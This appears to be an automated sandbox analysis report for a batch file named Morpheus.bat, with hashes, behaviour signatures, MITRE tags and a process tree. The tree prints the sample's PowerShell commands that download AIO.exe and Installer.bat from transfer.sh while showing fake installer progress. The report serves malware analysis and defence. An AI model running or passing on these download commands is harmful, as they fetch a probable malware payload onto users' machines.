cfe8b67cc2046f6c85e068f77498d85be2198bd69615d9c3746fac87fba51357

Analysis

max time kernel
43s
max time network
45s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
24/09/2022, 08:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Morpheus.bat
Size

1KB
MD5

dd90d98586b3c4efc4893ee2d8352e76
SHA1

9a2181410f22f8c33da2ee533ffc3052122e2d69
SHA256

cfe8b67cc2046f6c85e068f77498d85be2198bd69615d9c3746fac87fba51357
SHA512

8a7278e295ac33542f2fc5f247f6540c3db373852039c28d81fc050d8dee846cd722a33acc071a0957f2f6de04c582780dd3da0f9a255affdfb024f03f32f583

Score

7^/10

Malware Config

Signatures

Deletes itself 1 IoCs

pid	Process
1836	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Delays execution with timeout.exe 8 IoCs

evasion

pid	Process
1524	timeout.exe
964	timeout.exe
960	timeout.exe
1800	timeout.exe
1240	timeout.exe
1244	timeout.exe
1640	timeout.exe
1632	timeout.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1712	powershell.exe
2028	powershell.exe
896	powershell.exe
1584	powershell.exe
868	powershell.exe
564	powershell.exe
812	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	1712	powershell.exe
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	896	powershell.exe
Token: SeDebugPrivilege	1584	powershell.exe
Token: SeDebugPrivilege	868	powershell.exe
Token: SeDebugPrivilege	564	powershell.exe
Token: SeDebugPrivilege	812	powershell.exe

Suspicious use of WriteProcessMemory 45 IoCs

description	pid	Process	procid_target
PID 1836 wrote to memory of 1712	1836	cmd.exe	28
PID 1836 wrote to memory of 1712	1836	cmd.exe	28
PID 1836 wrote to memory of 1712	1836	cmd.exe	28
PID 1836 wrote to memory of 1244	1836	cmd.exe	29
PID 1836 wrote to memory of 1244	1836	cmd.exe	29
PID 1836 wrote to memory of 1244	1836	cmd.exe	29
PID 1836 wrote to memory of 2028	1836	cmd.exe	30
PID 1836 wrote to memory of 2028	1836	cmd.exe	30
PID 1836 wrote to memory of 2028	1836	cmd.exe	30
PID 1836 wrote to memory of 896	1836	cmd.exe	31
PID 1836 wrote to memory of 896	1836	cmd.exe	31
PID 1836 wrote to memory of 896	1836	cmd.exe	31
PID 1836 wrote to memory of 1640	1836	cmd.exe	32
PID 1836 wrote to memory of 1640	1836	cmd.exe	32
PID 1836 wrote to memory of 1640	1836	cmd.exe	32
PID 1836 wrote to memory of 1584	1836	cmd.exe	33
PID 1836 wrote to memory of 1584	1836	cmd.exe	33
PID 1836 wrote to memory of 1584	1836	cmd.exe	33
PID 1836 wrote to memory of 1632	1836	cmd.exe	34
PID 1836 wrote to memory of 1632	1836	cmd.exe	34
PID 1836 wrote to memory of 1632	1836	cmd.exe	34
PID 1836 wrote to memory of 868	1836	cmd.exe	35
PID 1836 wrote to memory of 868	1836	cmd.exe	35
PID 1836 wrote to memory of 868	1836	cmd.exe	35
PID 1836 wrote to memory of 1524	1836	cmd.exe	36
PID 1836 wrote to memory of 1524	1836	cmd.exe	36
PID 1836 wrote to memory of 1524	1836	cmd.exe	36
PID 1836 wrote to memory of 564	1836	cmd.exe	37
PID 1836 wrote to memory of 564	1836	cmd.exe	37
PID 1836 wrote to memory of 564	1836	cmd.exe	37
PID 1836 wrote to memory of 964	1836	cmd.exe	38
PID 1836 wrote to memory of 964	1836	cmd.exe	38
PID 1836 wrote to memory of 964	1836	cmd.exe	38
PID 1836 wrote to memory of 812	1836	cmd.exe	39
PID 1836 wrote to memory of 812	1836	cmd.exe	39
PID 1836 wrote to memory of 812	1836	cmd.exe	39
PID 1836 wrote to memory of 960	1836	cmd.exe	40
PID 1836 wrote to memory of 960	1836	cmd.exe	40
PID 1836 wrote to memory of 960	1836	cmd.exe	40
PID 1836 wrote to memory of 1800	1836	cmd.exe	41
PID 1836 wrote to memory of 1800	1836	cmd.exe	41
PID 1836 wrote to memory of 1800	1836	cmd.exe	41
PID 1836 wrote to memory of 1240	1836	cmd.exe	42
PID 1836 wrote to memory of 1240	1836	cmd.exe	42
PID 1836 wrote to memory of 1240	1836	cmd.exe	42

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Morpheus.bat"
1⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:1836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe write-host -foregroundcolor Green MORPHEUS TRADING INSTITUTE
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1712
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1244
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest https://transfer.sh/get/03vnqq/AIO.exe -OutFile AIO.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest https://transfer.sh/get/JewXvm/Installer.bat -OutFile Installer.bat"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:896
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1640
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe write-host -foregroundcolor DarkMagenta Completato: --- 25
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1584
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1632
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe write-host -foregroundcolor DarkMagenta Completato: ------ 50
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:868
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1524
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe write-host -foregroundcolor DarkMagenta Completato: --------- 75
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:564
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe write-host -foregroundcolor DarkMagenta Completato: ------------ 100
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:812
- C:\Windows\system32\timeout.exe
  timeout /t 4 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:960
- C:\Windows\system32\timeout.exe
  timeout /t 2 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1800
- C:\Windows\system32\timeout.exe
  timeout /t 4 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:1240

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
63abc78998a9aac93db9a2e2a0ab76a0

SHA1
7c7ad627606c5ca1cd380bbe21f80c2cd6b5b60a

SHA256
cfede624e00d36115ca485039071bc06cd153d0259dcacdb5a9a5e89cbfab81f

SHA512
e769e02c6d8001e745820ce2a948f96e0bd8cd2de274625363b096dd02704e2fa92e70b4c305b622ef8275ade2c6f8c5cdd534567982bf2184a2f9bc616ee61f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
63abc78998a9aac93db9a2e2a0ab76a0

SHA1
7c7ad627606c5ca1cd380bbe21f80c2cd6b5b60a

SHA256
cfede624e00d36115ca485039071bc06cd153d0259dcacdb5a9a5e89cbfab81f

SHA512
e769e02c6d8001e745820ce2a948f96e0bd8cd2de274625363b096dd02704e2fa92e70b4c305b622ef8275ade2c6f8c5cdd534567982bf2184a2f9bc616ee61f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
63abc78998a9aac93db9a2e2a0ab76a0

SHA1
7c7ad627606c5ca1cd380bbe21f80c2cd6b5b60a

SHA256
cfede624e00d36115ca485039071bc06cd153d0259dcacdb5a9a5e89cbfab81f

SHA512
e769e02c6d8001e745820ce2a948f96e0bd8cd2de274625363b096dd02704e2fa92e70b4c305b622ef8275ade2c6f8c5cdd534567982bf2184a2f9bc616ee61f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
63abc78998a9aac93db9a2e2a0ab76a0

SHA1
7c7ad627606c5ca1cd380bbe21f80c2cd6b5b60a

SHA256
cfede624e00d36115ca485039071bc06cd153d0259dcacdb5a9a5e89cbfab81f

SHA512
e769e02c6d8001e745820ce2a948f96e0bd8cd2de274625363b096dd02704e2fa92e70b4c305b622ef8275ade2c6f8c5cdd534567982bf2184a2f9bc616ee61f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
63abc78998a9aac93db9a2e2a0ab76a0

SHA1
7c7ad627606c5ca1cd380bbe21f80c2cd6b5b60a

SHA256
cfede624e00d36115ca485039071bc06cd153d0259dcacdb5a9a5e89cbfab81f

SHA512
e769e02c6d8001e745820ce2a948f96e0bd8cd2de274625363b096dd02704e2fa92e70b4c305b622ef8275ade2c6f8c5cdd534567982bf2184a2f9bc616ee61f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
63abc78998a9aac93db9a2e2a0ab76a0

SHA1
7c7ad627606c5ca1cd380bbe21f80c2cd6b5b60a

SHA256
cfede624e00d36115ca485039071bc06cd153d0259dcacdb5a9a5e89cbfab81f

SHA512
e769e02c6d8001e745820ce2a948f96e0bd8cd2de274625363b096dd02704e2fa92e70b4c305b622ef8275ade2c6f8c5cdd534567982bf2184a2f9bc616ee61f

Download Submit
memory/564-107-0x000007FEF3210000-0x000007FEF3C33000-memory.dmp

Filesize
10.1MB

Download
memory/564-111-0x0000000002A0B000-0x0000000002A2A000-memory.dmp

Filesize
124KB

Download
memory/564-109-0x000007FEF26B0000-0x000007FEF320D000-memory.dmp

Filesize
11.4MB

Download
memory/564-110-0x000000001B8B0000-0x000000001BBAF000-memory.dmp

Filesize
3.0MB

Download
memory/564-108-0x0000000002A04000-0x0000000002A07000-memory.dmp

Filesize
12KB

Download
memory/564-113-0x0000000002A0B000-0x0000000002A2A000-memory.dmp

Filesize
124KB

Download
memory/564-112-0x0000000002A04000-0x0000000002A07000-memory.dmp

Filesize
12KB

Download
memory/812-121-0x000000001B8A0000-0x000000001BB9F000-memory.dmp

Filesize
3.0MB

Download
memory/812-118-0x000007FEF3BB0000-0x000007FEF45D3000-memory.dmp

Filesize
10.1MB

Download
memory/812-120-0x0000000002A94000-0x0000000002A97000-memory.dmp

Filesize
12KB

Download
memory/812-123-0x0000000002A9B000-0x0000000002ABA000-memory.dmp

Filesize
124KB

Download
memory/812-119-0x000007FEF3050000-0x000007FEF3BAD000-memory.dmp

Filesize
11.4MB

Download
memory/812-122-0x0000000002A94000-0x0000000002A97000-memory.dmp

Filesize
12KB

Download
memory/868-98-0x000007FEF3050000-0x000007FEF3BAD000-memory.dmp

Filesize
11.4MB

Download
memory/868-97-0x000007FEF3BB0000-0x000007FEF45D3000-memory.dmp

Filesize
10.1MB

Download
memory/868-101-0x0000000001FAB000-0x0000000001FCA000-memory.dmp

Filesize
124KB

Download
memory/868-100-0x0000000001FA4000-0x0000000001FA7000-memory.dmp

Filesize
12KB

Download
memory/868-99-0x0000000001FA4000-0x0000000001FA7000-memory.dmp

Filesize
12KB

Download
memory/896-81-0x000000000276B000-0x000000000278A000-memory.dmp

Filesize
124KB

Download
memory/896-80-0x0000000002764000-0x0000000002767000-memory.dmp

Filesize
12KB

Download
memory/896-79-0x000000001B710000-0x000000001BA0F000-memory.dmp

Filesize
3.0MB

Download
memory/896-78-0x0000000002764000-0x0000000002767000-memory.dmp

Filesize
12KB

Download
memory/896-77-0x000007FEF3050000-0x000007FEF3BAD000-memory.dmp

Filesize
11.4MB

Download
memory/896-76-0x000007FEF3BB0000-0x000007FEF45D3000-memory.dmp

Filesize
10.1MB

Download
memory/1584-90-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

Filesize
3.0MB

Download
memory/1584-92-0x00000000024CB000-0x00000000024EA000-memory.dmp

Filesize
124KB

Download
memory/1584-91-0x00000000024C4000-0x00000000024C7000-memory.dmp

Filesize
12KB

Download
memory/1584-89-0x00000000024C4000-0x00000000024C7000-memory.dmp

Filesize
12KB

Download
memory/1584-88-0x000007FEF26B0000-0x000007FEF320D000-memory.dmp

Filesize
11.4MB

Download
memory/1584-87-0x000007FEF3210000-0x000007FEF3C33000-memory.dmp

Filesize
10.1MB

Download
memory/1712-59-0x000000001B730000-0x000000001BA2F000-memory.dmp

Filesize
3.0MB

Download
memory/1712-60-0x0000000002344000-0x0000000002347000-memory.dmp

Filesize
12KB

Download
memory/1712-55-0x000007FEFB6A1000-0x000007FEFB6A3000-memory.dmp

Filesize
8KB

Download
memory/1712-56-0x000007FEF3BB0000-0x000007FEF45D3000-memory.dmp

Filesize
10.1MB

Download
memory/1712-57-0x000007FEF3050000-0x000007FEF3BAD000-memory.dmp

Filesize
11.4MB

Download
memory/1712-58-0x0000000002344000-0x0000000002347000-memory.dmp

Filesize
12KB

Download
memory/1712-61-0x000000000234B000-0x000000000236A000-memory.dmp

Filesize
124KB

Download
memory/2028-68-0x0000000002764000-0x0000000002767000-memory.dmp

Filesize
12KB

Download
memory/2028-66-0x000007FEF3210000-0x000007FEF3C33000-memory.dmp

Filesize
10.1MB

Download
memory/2028-67-0x000007FEF26B0000-0x000007FEF320D000-memory.dmp

Filesize
11.4MB

Download
memory/2028-71-0x000000000276B000-0x000000000278A000-memory.dmp

Filesize
124KB

Download
memory/2028-69-0x000000001B6F0000-0x000000001B9EF000-memory.dmp

Filesize
3.0MB

Download
memory/2028-70-0x0000000002764000-0x0000000002767000-memory.dmp

Filesize
12KB

Download